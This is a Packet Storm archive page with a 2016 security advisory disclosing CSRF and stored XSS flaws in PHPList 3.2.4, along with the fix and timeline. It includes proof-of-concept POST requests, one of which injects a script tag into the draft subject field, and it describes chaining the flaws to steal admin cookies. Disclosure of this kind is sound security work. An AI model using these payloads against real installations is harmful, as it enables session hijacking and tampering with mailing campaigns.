Twenty Year Anniversary

PHPList 3.2.4 Cross Site Request Forgery / Cross Site Scripting

PHPList 3.2.4 Cross Site Request Forgery / Cross Site Scripting
Posted Jun 1, 2016
Authored by Mickael Dorigny

PHPList version 3.2.4 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | b27a45e55fe8110a04dcdd2c862beb1f

PHPList 3.2.4 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: PHPList v3.2.4 CSRF/XSS
# Date: 01/06/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: https://www.phplist.com/
# Version: 3.2.4
# Category: CSRF/XSS
######################################################################

PHPList description :
======================================================================
phpList is an open source software for managing mailing lists. It is designed for the dissemination of information, such as newsletters, news, advertising to list of subscribers. It is written in PHP and uses a MySQL database to store the information. phpList is free and open-source software subject to the terms of the Affero General Public License (AGPL).

Vulnerabilities description :
======================================================================
phpList version 3.2.4 is vulnerable to multiple vulnerabilities like :
- CSRF
- Stored XSS

Poc n°1 : CSRF on Campaign Draft modification
============================================
The draft modification process is vulnerable to CSRF attack. When using the form, we can see that a form anti-CSRF token is used but it can be removed from the request wihtout causing error. The only prerequisite to exploit this CSRF is to target an existing Draft ID. This can be done with a simple code tricks wich send multiple modification requests while incremeting the Draft ID for example. To modify the Draft 5, use the following parameters :

[URL]
http://server/admin/?page=send&id=5
[POSTDATA]
workaround_fck_bug=1&followupto=&subject=MODIFIED_SUBJECT&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=

This vulnerability can make an authenticated user change campaign content an alter user experience.

PoC n°2 : Stored XSS on Campaign Draft Name
============================================
The campaign draft name, displayed when listing all campaign draft, is vulnerable to Stored XSS attack. This mean that the vulnerable code is saved in the database and displayed each time a admin/user go on the campaign draft list :
http://server/admin/?page=messages&tab=draft

The following request exploit this vulnerability :

[URL]
http://server/admin/?page=send&id=5
[POSTDATA]
workaround_fck_bug=1&followupto=&subject=DATA"><script>alert("XSS_again")</script>&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=

Note that once this request is submitted, the user is not directly on the page that display the XSS. He have to go on this page : http://server/admin/?page=messages&tab=draft

Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies, and especially admin's ones.

Using two simple HTML page with auto JavaScript redirection, an attacker can exploit these two vulnerabilities to change the campaign draft content to make it display a Javascescript instruction and then use this Javascript execution to steal session cookie or bypass all other anti-CSRF protection of the PHPlist installation. The scenario exploiting this two vulnerabilities is presented in the video in "Addtional resources" section.

Solution:
======================================================================
- Update your PHPList installation to superior version (3.2.5 - https://www.phplist.org/newslist/phplist-3-2-5-whats-new/)

Additional resources :
======================================================================
- https://youtu.be/cU6ob4sCKgs
- https://www.phplist.org/newslist/phplist-3-2-5-whats-new/

Report timeline :
======================================================================
2016-05-11 : Advisory submitted to editor
2016-05-26 : Version 3.2.5 released with fixes
2016-06-01 : Public Advisory release

Credits :
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    5 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close